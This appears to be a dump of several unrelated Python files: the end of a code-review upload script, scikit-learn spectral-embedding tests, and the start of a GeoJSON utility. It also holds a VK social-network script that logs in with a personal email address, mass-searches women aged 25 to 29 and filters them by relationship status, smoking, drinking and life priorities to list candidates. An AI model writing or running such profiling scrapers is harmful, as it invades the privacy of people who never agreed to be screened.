form_fields.append(("base", base))
if options.issue:
form_fields.append(("issue", str(options.issue)))
if options.email:
form_fields.append(("user", options.email))
if options.reviewers:
for reviewer in options.reviewers.split(','):
if "@" in reviewer and not reviewer.split("@")[1].count(".") == 1:
ErrorExit("Invalid email address: %s" % reviewer)
form_fields.append(("reviewers", options.reviewers))
if options.cc:
for cc in options.cc.split(','):
if "@" in cc and not cc.split("@")[1].count(".") == 1:
ErrorExit("Invalid email address: %s" % cc)
form_fields.append(("cc", options.cc))
description = options.description
if options.description_file:
if options.description:
ErrorExit("Can't specify description and description_file")
file = open(options.description_file, 'r')
description = file.read()
file.close()
if description:
form_fields.append(("description", description))
# Send a hash of all the base file so the server can determine if a copy
# already exists in an earlier patchset.
base_hashes = ""
for file, info in files.iteritems():
if not info[0] is None:
checksum = md5(info[0]).hexdigest()
if base_hashes:
base_hashes += "|"
base_hashes += checksum + ":" + file
form_fields.append(("base_hashes", base_hashes))
if options.private:
if options.issue:
print "Warning: Private flag ignored when updating an existing issue."
else:
form_fields.append(("private", "1"))
# If we're uploading base files, don't send the email before the uploads, so
# that it contains the file status.
if options.send_mail and options.download_base:
form_fields.append(("send_mail", "1"))
if not options.download_base:
form_fields.append(("content_upload", "1"))
if len(data) > MAX_UPLOAD_SIZE:
print "Patch is large, so uploading file patches separately."
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = rpc_server.Send("/upload", body, content_type=ctype)
patchset = None
if not options.download_base or not uploaded_diff_file:
lines = response_body.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
else:
msg = response_body
else:
msg = response_body
if not response_body.startswith("Issue created.") and \
not response_body.startswith("Issue updated."):
print >>sys.stderr, msg
sys.exit(0)
issue = msg[msg.rfind("/")+1:]
if not uploaded_diff_file:
result = UploadSeparatePatches(issue, rpc_server, patchset, data, options)
if not options.download_base:
patches = result
if not options.download_base:
vcs.UploadBaseFiles(issue, rpc_server, patches, patchset, options, files)
if options.send_mail:
rpc_server.Send("/" + issue + "/mail", payload="")
return issue, patchset
def main():
try:
RealMain(sys.argv)
except KeyboardInterrupt:
print
StatusUpdate("Interrupted.")
sys.exit(1)
|
import pytest
import numpy as np
from scipy import sparse
from scipy.sparse import csgraph
from scipy.linalg import eigh
from sklearn.manifold import SpectralEmbedding
from sklearn.manifold._spectral_embedding import _graph_is_connected
from sklearn.manifold._spectral_embedding import _graph_connected_component
from sklearn.manifold import spectral_embedding
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.metrics import normalized_mutual_info_score
from sklearn.neighbors import NearestNeighbors
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_array_equal
# non centered, sparse centers to check the
centers = np.array([
[0.0, 5.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 4.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 5.0, 1.0],
])
n_samples = 1000
n_clusters, n_features = centers.shape
S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
cluster_std=1., random_state=42)
def _check_with_col_sign_flipping(A, B, tol=0.0):
""" Check array A and B are equal with possible sign flipping on
each columns"""
sign = True
for column_idx in range(A.shape[1]):
sign = sign and ((((A[:, column_idx] -
B[:, column_idx]) ** 2).mean() <= tol ** 2) or
(((A[:, column_idx] +
B[:, column_idx]) ** 2).mean() <= tol ** 2))
if not sign:
return False
return True
def test_sparse_graph_connected_component():
rng = np.random.RandomState(42)
n_samples = 300
boundaries = [0, 42, 121, 200, n_samples]
p = rng.permutation(n_samples)
connections = []
for start, stop in zip(boundaries[:-1], boundaries[1:]):
group = p[start:stop]
# Connect all elements within the group at least once via an
# arbitrary path that spans the group.
for i in range(len(group) - 1):
connections.append((group[i], group[i + 1]))
# Add some more random connections within the group
min_idx, max_idx = 0, len(group) - 1
n_random_connections = 1000
source = rng.randint(min_idx, max_idx, size=n_random_connections)
target = rng.randint(min_idx, max_idx, size=n_random_connections)
connections.extend(zip(group[source], group[target]))
# Build a symmetric affinity matrix
row_idx, column_idx = tuple(np.array(connections).T)
data = rng.uniform(.1, 42, size=len(connections))
affinity = sparse.coo_matrix((data, (row_idx, column_idx)))
affinity = 0.5 * (affinity + affinity.T)
for start, stop in zip(boundaries[:-1], boundaries[1:]):
component_1 = _graph_connected_component(affinity, p[start])
component_size = stop - start
assert component_1.sum() == component_size
# We should retrieve the same component mask by starting by both ends
# of the group
component_2 = _graph_connected_component(affinity, p[stop - 1])
assert component_2.sum() == component_size
assert_array_equal(component_1, component_2)
def test_spectral_embedding_two_components(seed=36):
# Test spectral embedding with two components
random_state = np.random.RandomState(seed)
n_sample = 100
affinity = np.zeros(shape=[n_sample * 2, n_sample * 2])
# first component
affinity[0:n_sample,
0:n_sample] = np.abs(random_state.randn(n_sample, n_sample)) + 2
# second component
affinity[n_sample::,
n_sample::] = np.abs(random_state.randn(n_sample, n_sample)) + 2
# Test of internal _graph_connected_component before connection
component = _graph_connected_component(affinity, 0)
assert component[:n_sample].all()
assert not component[n_sample:].any()
component = _graph_connected_component(affinity, -1)
assert not component[:n_sample].any()
assert component[n_sample:].all()
# connection
affinity[0, n_sample + 1] = 1
affinity[n_sample + 1, 0] = 1
affinity.flat[::2 * n_sample + 1] = 0
affinity = 0.5 * (affinity + affinity.T)
true_label = np.zeros(shape=2 * n_sample)
true_label[0:n_sample] = 1
se_precomp = SpectralEmbedding(n_components=1, affinity="precomputed",
random_state=np.random.RandomState(seed))
embedded_coordinate = se_precomp.fit_transform(affinity)
# Some numpy versions are touchy with types
embedded_coordinate = \
se_precomp.fit_transform(affinity.astype(np.float32))
# thresholding on the first components using 0.
label_ = np.array(embedded_coordinate.ravel() < 0, dtype="float")
assert normalized_mutual_info_score(true_label, label_) == 1.0
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
ids=["dense", "sparse"])
def test_spectral_embedding_precomputed_affinity(X, seed=36):
# Test spectral embedding with precomputed kernel
gamma = 1.0
se_precomp = SpectralEmbedding(n_components=2, affinity="precomputed",
random_state=np.random.RandomState(seed))
se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
gamma=gamma,
random_state=np.random.RandomState(seed))
embed_precomp = se_precomp.fit_transform(rbf_kernel(X, gamma=gamma))
embed_rbf = se_rbf.fit_transform(X)
assert_array_almost_equal(
se_precomp.affinity_matrix_, se_rbf.affinity_matrix_)
assert _check_with_col_sign_flipping(embed_precomp, embed_rbf, 0.05)
def test_precomputed_nearest_neighbors_filtering():
# Test precomputed graph filtering when containing too many neighbors
n_neighbors = 2
results = []
for additional_neighbors in [0, 10]:
nn = NearestNeighbors(
n_neighbors=n_neighbors + additional_neighbors).fit(S)
graph = nn.kneighbors_graph(S, mode='connectivity')
embedding = SpectralEmbedding(random_state=0, n_components=2,
affinity='precomputed_nearest_neighbors',
n_neighbors=n_neighbors
).fit(graph).embedding_
results.append(embedding)
assert_array_equal(results[0], results[1])
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
ids=["dense", "sparse"])
def test_spectral_embedding_callable_affinity(X, seed=36):
# Test spectral embedding with callable affinity
gamma = 0.9
kern = rbf_kernel(S, gamma=gamma)
se_callable = SpectralEmbedding(n_components=2,
affinity=(
lambda x: rbf_kernel(x, gamma=gamma)),
gamma=gamma,
random_state=np.random.RandomState(seed))
se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
gamma=gamma,
random_state=np.random.RandomState(seed))
embed_rbf = se_rbf.fit_transform(X)
embed_callable = se_callable.fit_transform(X)
assert_array_almost_equal(
se_callable.affinity_matrix_, se_rbf.affinity_matrix_)
assert_array_almost_equal(kern, se_rbf.affinity_matrix_)
assert _check_with_col_sign_flipping(embed_rbf, embed_callable, 0.05)
# TODO: Remove when pyamg does replaces sp.rand call with np.random.rand
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
"ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver(seed=36):
# Test spectral embedding with amg solver
pytest.importorskip('pyamg')
se_amg = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
eigen_solver="amg", n_neighbors=5,
random_state=np.random.RandomState(seed))
se_arpack = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
eigen_solver="arpack", n_neighbors=5,
random_state=np.random.RandomState(seed))
embed_amg = se_amg.fit_transform(S)
embed_arpack = se_arpack.fit_transform(S)
assert _check_with_col_sign_flipping(embed_amg, embed_arpack, 1e-5)
# same with special case in which amg is not actually used
# regression test for #10715
# affinity between nodes
row = [0, 0, 1, 2, 3, 3, 4]
col = [1, 2, 2, 3, 4, 5, 5]
val = [100, 100, 100, 1, 100, 100, 100]
affinity = sparse.coo_matrix((val + val, (row + col, col + row)),
shape=(6, 6)).toarray()
se_amg.affinity = "precomputed"
se_arpack.affinity = "precomputed"
embed_amg = se_amg.fit_transform(affinity)
embed_arpack = se_arpack.fit_transform(affinity)
assert _check_with_col_sign_flipping(embed_amg, embed_arpack, 1e-5)
# TODO: Remove when pyamg does replaces sp.rand call with np.random.rand
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
"ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver_failure(seed=36):
# Test spectral embedding with amg solver failure, see issue #13393
pytest.importorskip('pyamg')
# The generated graph below is NOT fully connected if n_neighbors=3
n_samples = 200
n_clusters = 3
n_features = 3
centers = np.eye(n_clusters, n_features)
S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
cluster_std=1., random_state=42)
se_amg0 = SpectralEmbedding(n_components=3, affinity="nearest_neighbors",
eigen_solver="amg", n_neighbors=3,
random_state=np.random.RandomState(seed))
embed_amg0 = se_amg0.fit_transform(S)
for i in range(10):
se_amg0.set_params(random_state=np.random.RandomState(seed + 1))
embed_amg1 = se_amg0.fit_transform(S)
assert _check_with_col_sign_flipping(embed_amg0, embed_amg1, 0.05)
@pytest.mark.filterwarnings("ignore:the behavior of nmi will "
"change in version 0.22")
def test_pipeline_spectral_clustering(seed=36):
# Test using pipeline to do spectral clustering
random_state = np.random.RandomState(seed)
se_rbf = SpectralEmbedding(n_components=n_clusters,
affinity="rbf",
random_state=random_state)
se_knn = SpectralEmbedding(n_components=n_clusters,
affinity="nearest_neighbors",
n_neighbors=5,
random_state=random_state)
for se in [se_rbf, se_knn]:
km = KMeans(n_clusters=n_clusters, random_state=random_state)
km.fit(se.fit_transform(S))
assert_array_almost_equal(
normalized_mutual_info_score(
km.labels_,
true_labels), 1.0, 2)
def test_spectral_embedding_unknown_eigensolver(seed=36):
# Test that SpectralClustering fails with an unknown eigensolver
se = SpectralEmbedding(n_components=1, affinity="precomputed",
random_state=np.random.RandomState(seed),
eigen_solver="<unknown>")
with pytest.raises(ValueError):
se.fit(S)
def test_spectral_embedding_unknown_affinity(seed=36):
# Test that SpectralClustering fails with an unknown affinity type
se = SpectralEmbedding(n_components=1, affinity="<unknown>",
random_state=np.random.RandomState(seed))
with pytest.raises(ValueError):
se.fit(S)
def test_connectivity(seed=36):
# Test that graph connectivity test works as expected
graph = np.array([[1, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 1, 1],
[0, 0, 0, 1, 1]])
assert not _graph_is_connected(graph)
assert not _graph_is_connected(sparse.csr_matrix(graph))
assert not _graph_is_connected(sparse.csc_matrix(graph))
graph = np.array([[1, 1, 0, 0, 0],
[1, 1, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 1, 1],
[0, 0, 0, 1, 1]])
assert _graph_is_connected(graph)
assert _graph_is_connected(sparse.csr_matrix(graph))
assert _graph_is_connected(sparse.csc_matrix(graph))
def test_spectral_embedding_deterministic():
# Test that Spectral Embedding is deterministic
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
embedding_1 = spectral_embedding(sims)
embedding_2 = spectral_embedding(sims)
assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_unnormalized():
# Test that spectral_embedding is also processing unnormalized laplacian
# correctly
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
n_components = 8
embedding_1 = spectral_embedding(sims,
norm_laplacian=False,
n_components=n_components,
drop_first=False)
# Verify using manual computation with dense eigh
laplacian, dd = csgraph.laplacian(sims, normed=False,
return_diag=True)
_, diffusion_map = eigh(laplacian)
embedding_2 = diffusion_map.T[:n_components]
embedding_2 = _deterministic_vector_sign_flip(embedding_2).T
assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_first_eigen_vector():
# Test that the first eigenvector of spectral_embedding
# is constant and that the second is not (for a connected graph)
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
n_components = 2
for seed in range(10):
embedding = spectral_embedding(sims,
norm_laplacian=False,
n_components=n_components,
drop_first=False,
random_state=seed)
assert np.std(embedding[:, 0]) == pytest.approx(0)
assert np.std(embedding[:, 1]) > 1e-3
[MRG+1] Better non-regression test for spectral embedding AMG solver issue (#16014)
import pytest
import numpy as np
from scipy import sparse
from scipy.sparse import csgraph
from scipy.linalg import eigh
from sklearn.manifold import SpectralEmbedding
from sklearn.manifold._spectral_embedding import _graph_is_connected
from sklearn.manifold._spectral_embedding import _graph_connected_component
from sklearn.manifold import spectral_embedding
from sklearn.metrics.pairwise import rbf_kernel
from sklearn.metrics import normalized_mutual_info_score
from sklearn.neighbors import NearestNeighbors
from sklearn.cluster import KMeans
from sklearn.datasets import make_blobs
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils._testing import assert_array_almost_equal
from sklearn.utils._testing import assert_array_equal
# non centered, sparse centers to check the
centers = np.array([
[0.0, 5.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 4.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 5.0, 1.0],
])
n_samples = 1000
n_clusters, n_features = centers.shape
S, true_labels = make_blobs(n_samples=n_samples, centers=centers,
cluster_std=1., random_state=42)
def _check_with_col_sign_flipping(A, B, tol=0.0):
""" Check array A and B are equal with possible sign flipping on
each columns"""
sign = True
for column_idx in range(A.shape[1]):
sign = sign and ((((A[:, column_idx] -
B[:, column_idx]) ** 2).mean() <= tol ** 2) or
(((A[:, column_idx] +
B[:, column_idx]) ** 2).mean() <= tol ** 2))
if not sign:
return False
return True
def test_sparse_graph_connected_component():
rng = np.random.RandomState(42)
n_samples = 300
boundaries = [0, 42, 121, 200, n_samples]
p = rng.permutation(n_samples)
connections = []
for start, stop in zip(boundaries[:-1], boundaries[1:]):
group = p[start:stop]
# Connect all elements within the group at least once via an
# arbitrary path that spans the group.
for i in range(len(group) - 1):
connections.append((group[i], group[i + 1]))
# Add some more random connections within the group
min_idx, max_idx = 0, len(group) - 1
n_random_connections = 1000
source = rng.randint(min_idx, max_idx, size=n_random_connections)
target = rng.randint(min_idx, max_idx, size=n_random_connections)
connections.extend(zip(group[source], group[target]))
# Build a symmetric affinity matrix
row_idx, column_idx = tuple(np.array(connections).T)
data = rng.uniform(.1, 42, size=len(connections))
affinity = sparse.coo_matrix((data, (row_idx, column_idx)))
affinity = 0.5 * (affinity + affinity.T)
for start, stop in zip(boundaries[:-1], boundaries[1:]):
component_1 = _graph_connected_component(affinity, p[start])
component_size = stop - start
assert component_1.sum() == component_size
# We should retrieve the same component mask by starting by both ends
# of the group
component_2 = _graph_connected_component(affinity, p[stop - 1])
assert component_2.sum() == component_size
assert_array_equal(component_1, component_2)
def test_spectral_embedding_two_components(seed=36):
# Test spectral embedding with two components
random_state = np.random.RandomState(seed)
n_sample = 100
affinity = np.zeros(shape=[n_sample * 2, n_sample * 2])
# first component
affinity[0:n_sample,
0:n_sample] = np.abs(random_state.randn(n_sample, n_sample)) + 2
# second component
affinity[n_sample::,
n_sample::] = np.abs(random_state.randn(n_sample, n_sample)) + 2
# Test of internal _graph_connected_component before connection
component = _graph_connected_component(affinity, 0)
assert component[:n_sample].all()
assert not component[n_sample:].any()
component = _graph_connected_component(affinity, -1)
assert not component[:n_sample].any()
assert component[n_sample:].all()
# connection
affinity[0, n_sample + 1] = 1
affinity[n_sample + 1, 0] = 1
affinity.flat[::2 * n_sample + 1] = 0
affinity = 0.5 * (affinity + affinity.T)
true_label = np.zeros(shape=2 * n_sample)
true_label[0:n_sample] = 1
se_precomp = SpectralEmbedding(n_components=1, affinity="precomputed",
random_state=np.random.RandomState(seed))
embedded_coordinate = se_precomp.fit_transform(affinity)
# Some numpy versions are touchy with types
embedded_coordinate = \
se_precomp.fit_transform(affinity.astype(np.float32))
# thresholding on the first components using 0.
label_ = np.array(embedded_coordinate.ravel() < 0, dtype="float")
assert normalized_mutual_info_score(true_label, label_) == 1.0
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
ids=["dense", "sparse"])
def test_spectral_embedding_precomputed_affinity(X, seed=36):
# Test spectral embedding with precomputed kernel
gamma = 1.0
se_precomp = SpectralEmbedding(n_components=2, affinity="precomputed",
random_state=np.random.RandomState(seed))
se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
gamma=gamma,
random_state=np.random.RandomState(seed))
embed_precomp = se_precomp.fit_transform(rbf_kernel(X, gamma=gamma))
embed_rbf = se_rbf.fit_transform(X)
assert_array_almost_equal(
se_precomp.affinity_matrix_, se_rbf.affinity_matrix_)
assert _check_with_col_sign_flipping(embed_precomp, embed_rbf, 0.05)
def test_precomputed_nearest_neighbors_filtering():
# Test precomputed graph filtering when containing too many neighbors
n_neighbors = 2
results = []
for additional_neighbors in [0, 10]:
nn = NearestNeighbors(
n_neighbors=n_neighbors + additional_neighbors).fit(S)
graph = nn.kneighbors_graph(S, mode='connectivity')
embedding = SpectralEmbedding(random_state=0, n_components=2,
affinity='precomputed_nearest_neighbors',
n_neighbors=n_neighbors
).fit(graph).embedding_
results.append(embedding)
assert_array_equal(results[0], results[1])
@pytest.mark.parametrize("X", [S, sparse.csr_matrix(S)],
ids=["dense", "sparse"])
def test_spectral_embedding_callable_affinity(X, seed=36):
# Test spectral embedding with callable affinity
gamma = 0.9
kern = rbf_kernel(S, gamma=gamma)
se_callable = SpectralEmbedding(n_components=2,
affinity=(
lambda x: rbf_kernel(x, gamma=gamma)),
gamma=gamma,
random_state=np.random.RandomState(seed))
se_rbf = SpectralEmbedding(n_components=2, affinity="rbf",
gamma=gamma,
random_state=np.random.RandomState(seed))
embed_rbf = se_rbf.fit_transform(X)
embed_callable = se_callable.fit_transform(X)
assert_array_almost_equal(
se_callable.affinity_matrix_, se_rbf.affinity_matrix_)
assert_array_almost_equal(kern, se_rbf.affinity_matrix_)
assert _check_with_col_sign_flipping(embed_rbf, embed_callable, 0.05)
# TODO: Remove when pyamg does replaces sp.rand call with np.random.rand
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
"ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver(seed=36):
# Test spectral embedding with amg solver
pytest.importorskip('pyamg')
se_amg = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
eigen_solver="amg", n_neighbors=5,
random_state=np.random.RandomState(seed))
se_arpack = SpectralEmbedding(n_components=2, affinity="nearest_neighbors",
eigen_solver="arpack", n_neighbors=5,
random_state=np.random.RandomState(seed))
embed_amg = se_amg.fit_transform(S)
embed_arpack = se_arpack.fit_transform(S)
assert _check_with_col_sign_flipping(embed_amg, embed_arpack, 1e-5)
# same with special case in which amg is not actually used
# regression test for #10715
# affinity between nodes
row = [0, 0, 1, 2, 3, 3, 4]
col = [1, 2, 2, 3, 4, 5, 5]
val = [100, 100, 100, 1, 100, 100, 100]
affinity = sparse.coo_matrix((val + val, (row + col, col + row)),
shape=(6, 6)).toarray()
se_amg.affinity = "precomputed"
se_arpack.affinity = "precomputed"
embed_amg = se_amg.fit_transform(affinity)
embed_arpack = se_arpack.fit_transform(affinity)
assert _check_with_col_sign_flipping(embed_amg, embed_arpack, 1e-5)
# TODO: Remove filterwarnings when pyamg does replaces sp.rand call with
# np.random.rand:
# https://github.com/scikit-learn/scikit-learn/issues/15913
@pytest.mark.filterwarnings(
"ignore:scipy.rand is deprecated:DeprecationWarning:pyamg.*")
def test_spectral_embedding_amg_solver_failure():
# Non-regression test for amg solver failure (issue #13393 on github)
pytest.importorskip('pyamg')
seed = 36
num_nodes = 100
X = sparse.rand(num_nodes, num_nodes, density=0.1, random_state=seed)
upper = sparse.triu(X) - sparse.diags(X.diagonal())
sym_matrix = upper + upper.T
embedding = spectral_embedding(sym_matrix,
n_components=10,
eigen_solver='amg',
random_state=0)
# Check that the learned embedding is stable w.r.t. random solver init:
for i in range(3):
new_embedding = spectral_embedding(sym_matrix,
n_components=10,
eigen_solver='amg',
random_state=i + 1)
assert _check_with_col_sign_flipping(
embedding, new_embedding, tol=0.05)
@pytest.mark.filterwarnings("ignore:the behavior of nmi will "
"change in version 0.22")
def test_pipeline_spectral_clustering(seed=36):
# Test using pipeline to do spectral clustering
random_state = np.random.RandomState(seed)
se_rbf = SpectralEmbedding(n_components=n_clusters,
affinity="rbf",
random_state=random_state)
se_knn = SpectralEmbedding(n_components=n_clusters,
affinity="nearest_neighbors",
n_neighbors=5,
random_state=random_state)
for se in [se_rbf, se_knn]:
km = KMeans(n_clusters=n_clusters, random_state=random_state)
km.fit(se.fit_transform(S))
assert_array_almost_equal(
normalized_mutual_info_score(
km.labels_,
true_labels), 1.0, 2)
def test_spectral_embedding_unknown_eigensolver(seed=36):
# Test that SpectralClustering fails with an unknown eigensolver
se = SpectralEmbedding(n_components=1, affinity="precomputed",
random_state=np.random.RandomState(seed),
eigen_solver="<unknown>")
with pytest.raises(ValueError):
se.fit(S)
def test_spectral_embedding_unknown_affinity(seed=36):
# Test that SpectralClustering fails with an unknown affinity type
se = SpectralEmbedding(n_components=1, affinity="<unknown>",
random_state=np.random.RandomState(seed))
with pytest.raises(ValueError):
se.fit(S)
def test_connectivity(seed=36):
# Test that graph connectivity test works as expected
graph = np.array([[1, 0, 0, 0, 0],
[0, 1, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 1, 1],
[0, 0, 0, 1, 1]])
assert not _graph_is_connected(graph)
assert not _graph_is_connected(sparse.csr_matrix(graph))
assert not _graph_is_connected(sparse.csc_matrix(graph))
graph = np.array([[1, 1, 0, 0, 0],
[1, 1, 1, 0, 0],
[0, 1, 1, 1, 0],
[0, 0, 1, 1, 1],
[0, 0, 0, 1, 1]])
assert _graph_is_connected(graph)
assert _graph_is_connected(sparse.csr_matrix(graph))
assert _graph_is_connected(sparse.csc_matrix(graph))
def test_spectral_embedding_deterministic():
# Test that Spectral Embedding is deterministic
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
embedding_1 = spectral_embedding(sims)
embedding_2 = spectral_embedding(sims)
assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_unnormalized():
# Test that spectral_embedding is also processing unnormalized laplacian
# correctly
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
n_components = 8
embedding_1 = spectral_embedding(sims,
norm_laplacian=False,
n_components=n_components,
drop_first=False)
# Verify using manual computation with dense eigh
laplacian, dd = csgraph.laplacian(sims, normed=False,
return_diag=True)
_, diffusion_map = eigh(laplacian)
embedding_2 = diffusion_map.T[:n_components]
embedding_2 = _deterministic_vector_sign_flip(embedding_2).T
assert_array_almost_equal(embedding_1, embedding_2)
def test_spectral_embedding_first_eigen_vector():
# Test that the first eigenvector of spectral_embedding
# is constant and that the second is not (for a connected graph)
random_state = np.random.RandomState(36)
data = random_state.randn(10, 30)
sims = rbf_kernel(data)
n_components = 2
for seed in range(10):
embedding = spectral_embedding(sims,
norm_laplacian=False,
n_components=n_components,
drop_first=False,
random_state=seed)
assert np.std(embedding[:, 0]) == pytest.approx(0)
assert np.std(embedding[:, 1]) > 1e-3
|
import vk_api
#birth_month
#religion interests about
#fields last_seen movies music online
#personal -
# people_main 1 2 !3 !4 5 ?6
# life_main !1 !2 !3 4 5 6 !7 !8
# smoking 1 2 not 3 4 5
# alcohol 1 2 not 3 4 5
# relation 0 1 6 not 2-5 7 8
#city=121 rybinsk
#country=1
#sex=1
#status not 2 3 4 5 7 8
#sex 1=W 2=M
password = open('/home/ksi/password').read().strip()
vk_session = vk_api.VkApi('ksilenomen@gmail.com', password)
vk_session.auth()
vk = vk_session.get_api()
age = 25
def vk_get_users(age, sex=1):
city=121 # rybinsk
users = []
a = 0
for birth_month in range(1, 13):
r = vk.users.search(count=1000, city=city, sex=sex, birth_month=birth_month, age_from=age, age_to=age, fields='about, books, interests, personal, relation')
print('count: ', r['count'])
a += r['count']
users.extend(r['items'])
print('a count: ', a)
return users
def vk_filter_(users):
filtred = list()
for user in users:
if not user.get('personal', False):
continue
if not user.get('relation', False):
continue
# Только свободные
if not user['relation'] in [0, 1, 6]:
continue
if not user['personal'].get('smoking', 1) in [1, 2]:
continue
if not user['personal'].get('alcohol', 1) in [1, 2]:
continue
if not user['personal'].get('people_main', 1) in [1, 2, 5, 6]:
continue
if not user['personal'].get('life_main', 4) in [4, 5, 6]:
continue
filtred.append(user)
return filtred
def vk_users_agefromto(f, t):
users = list()
for age in range(f, t+1):
users.extend(vk_get_users(age))
return users
def vk_print_user(user):
print('http://vk.com/id{} {} {}'.format(
user['id'],
user['first_name'],
user['last_name'],
))
print(" {} {} {}".format(
user.get('interests'),
user.get('books'),
user.get('about'),
))
#print(user)
users = vk_users_agefromto(25, 29)
#users = vk_get_users(25)
print('all: ', len(users))
users = vk_filter_(users)
print(len(users))
#vk_print_user(users[0])
for u in users:
vk_print_user(u)
vk_search
import vk_api
from datetime import datetime
#birth_month
#religion interests about
#fields last_seen movies music online
#personal -
# people_main 1 2 !3 !4 5 ?6
# life_main !1 !2 !3 4 5 6 !7 !8
# smoking 1 2 not 3 4 5
# alcohol 1 2 not 3 4 5
# relation 0 1 6 not 2-5 7 8
#city=121 rybinsk
#country=1
#sex=1
#status not 2 3 4 5 7 8
#sex 1=W 2=M
# groups - not Порно секс мамы маме Дискотека
password = open('/home/ksi/password').read().strip()
vk_session = vk_api.VkApi('ksilenomen@gmail.com', password)
vk_session.auth()
vk = vk_session.get_api()
age = 25
current_year = 2019
def vk_get_users(age, sex=1):
city=121 # rybinsk
users = []
a = 0
for birth_month in range(1, 13):
r = vk.users.search(count=1000, sex=sex, birth_month=birth_month, age_from=age, age_to=age, fields='about, books, interests, personal, relation, last_seen')
#r = vk.users.search(count=1000, city=city, sex=sex, birth_month=birth_month, age_from=age, age_to=age, fields='about, books, interests, personal, relation, last_seen')
print('count: ', r['count'])
a += r['count']
users.extend(r['items'])
print('a count: ', a)
return vk_filter_(users)
def vk_filter_(users):
filtred = list()
for user in users:
if not user.get('personal', False):
continue
if not user.get('relation', False):
continue
# Только свободные
if not user['relation'] in [0, 1]: #6 - в активном
continue
if not user['personal'].get('smoking', 1) in [1, 2]:
continue
if not user['personal'].get('alcohol', 1) in [1, 2]:
continue
if not user['personal'].get('people_main', 0) in [1, 2, 5, 6]:
continue
if not user['personal'].get('life_main', 0) in [4, 5, 6]:
continue
ts = int(user.get('last_seen').get('time'))
tm = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
year = int(datetime.utcfromtimestamp(ts).strftime('%Y'))
if year != current_year:
continue
filtred.append(user)
return filtred
def vk_users_agefromto(f, t):
users = list()
for age in range(f, t+1):
users.extend(vk_get_users(age))
return users
def vk_print_user(user, full=False):
print('http://vk.com/id{} {} {}'.format(
user['id'],
user['first_name'],
user['last_name'],
))
if full:
print(" {} {} {} ".format(
user.get('interests'),
user.get('books'),
user.get('about'),
))
users = vk_users_agefromto(27, 29)
print('all: ', len(users))
#users = vk_filter_(users)
print(len(users))
for u in users:
vk_print_user(u)
vk_print_user(users[0], True)
|
"""Coordinate utility functions."""
def coords(obj):
"""
Yields the coordinates from a Feature or Geometry.
:param obj: A geometry or feature to extract the coordinates from."
:type obj: Feature, Geometry
:return: A generator with coordinate tuples from the geometry or feature.
:rtype: generator
"""
if isinstance(obj, (tuple, list)):
coordinates = obj
elif 'geometry' in obj:
coordinates = obj['geometry']['coordinates']
else:
coordinates = obj.get('coordinates', obj)
for e in coordinates:
if isinstance(e, (float, int)):
yield tuple(coordinates)
break
for f in coords(e):
yield f
def map_coords(func, obj):
"""
Returns the coordinates from a Geometry after applying the provided
function to the tuples.
:param obj: A geometry or feature to extract the coordinates from.
:type obj: Point, LineString, MultiPoint, MultiLineString, Polygon,
MultiPolygon
:return: The result of applying the function to each coordinate array.
:rtype: list
:raises ValueError: if the provided object is not a Geometry.
"""
if obj['type'] == 'Point':
coordinates = tuple(map(func, obj['coordinates']))
elif obj['type'] in ['LineString', 'MultiPoint']:
coordinates = [tuple(map(func, c)) for c in obj['coordinates']]
elif obj['type'] in ['MultiLineString', 'Polygon']:
coordinates = [[
tuple(map(func, c)) for c in curve]
for curve in obj['coordinates']]
elif obj['type'] == 'MultiPolygon':
coordinates = [[[
tuple(map(func, c)) for c in curve]
for curve in part]
for part in obj['coordinates']]
else:
raise ValueError("Invalid geometry object %s" % repr(obj))
return {'type': obj['type'], 'coordinates': coordinates}
def generate_random(featureType, numberFeatures=1,
numberVertices=3, boundingBox=[-180.0, -90.0, 180.0, 90.0]):
"""
Generates random geojson features depending on the parameters
